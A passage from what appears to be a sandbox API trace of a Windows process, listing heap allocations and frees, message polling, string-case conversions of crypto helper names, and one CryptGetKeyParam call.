(HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0041.252] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0041.252] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0041.252] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0041.252] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0041.252] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0041.252] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0041.252] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.252] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0041.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0041.252] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0041.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0041.252] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0041.252] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.252] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0041.252] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0041.252] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0041.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0041.252] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0041.252] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0041.252] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0041.252] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0041.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0041.252] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0041.252] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0041.253] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0041.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0041.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0041.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0041.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2c8 [0041.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0041.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0041.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0041.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0041.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889670 [0041.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0041.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0041.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0041.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0041.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0041.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0041.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0041.253] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0041.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0041.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0041.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0041.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0041.253] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0041.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0041.254] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0041.254] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0041.254] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0041.254] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0041.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0041.254] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0041.254] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0041.254] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0041.254] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0041.254] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0041.254] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0041.254] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0041.254] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0041.254] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0041.254] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0041.254] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0041.254] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0041.254] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0041.254] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0041.254] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0041.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0041.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0041.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0041.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0041.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0041.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0041.254] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0041.254] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0041.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0041.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0041.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0041.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0041.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0041.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.255] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0041.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0041.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0041.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0041.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0041.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0041.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0041.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0041.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0041.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0041.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0041.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0041.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0041.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0041.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0041.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0041.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0041.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0041.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0041.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0041.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0041.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0041.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0041.256] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0041.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0041.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0041.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0041.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0041.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0041.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0041.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0041.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0041.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0041.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0041.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0041.256] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0041.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb68 [0041.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0041.256] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0041.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0041.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0041.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0041.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0041.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0041.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0041.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0041.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0041.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0041.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0041.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0041.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0041.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0041.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0041.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0041.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0041.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0041.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0041.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0041.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0041.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0041.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0041.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0041.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0041.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0041.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0041.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0041.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0041.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0041.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0041.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0041.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0041.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0041.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0041.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0041.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0041.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0041.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0041.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0041.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0041.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0041.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0041.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0041.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0041.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0041.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0041.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0041.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0041.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0041.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0041.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0041.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0041.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0041.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0041.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0041.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0041.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0041.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0041.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0041.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0041.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0041.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0041.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0041.259] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0041.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0041.259] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.259] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0041.259] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0041.259] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0041.259] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0041.259] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0041.259] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0041.259] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0041.259] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0041.259] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0041.259] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0041.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0041.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0041.259] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0041.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0041.259] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0041.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0041.259] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0041.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0041.260] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da308, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da308*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0041.260] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.260] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.260] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.260] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.260] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.260] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0041.260] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.260] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.260] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0041.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0041.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0041.260] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.260] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.260] HeapFree (in: 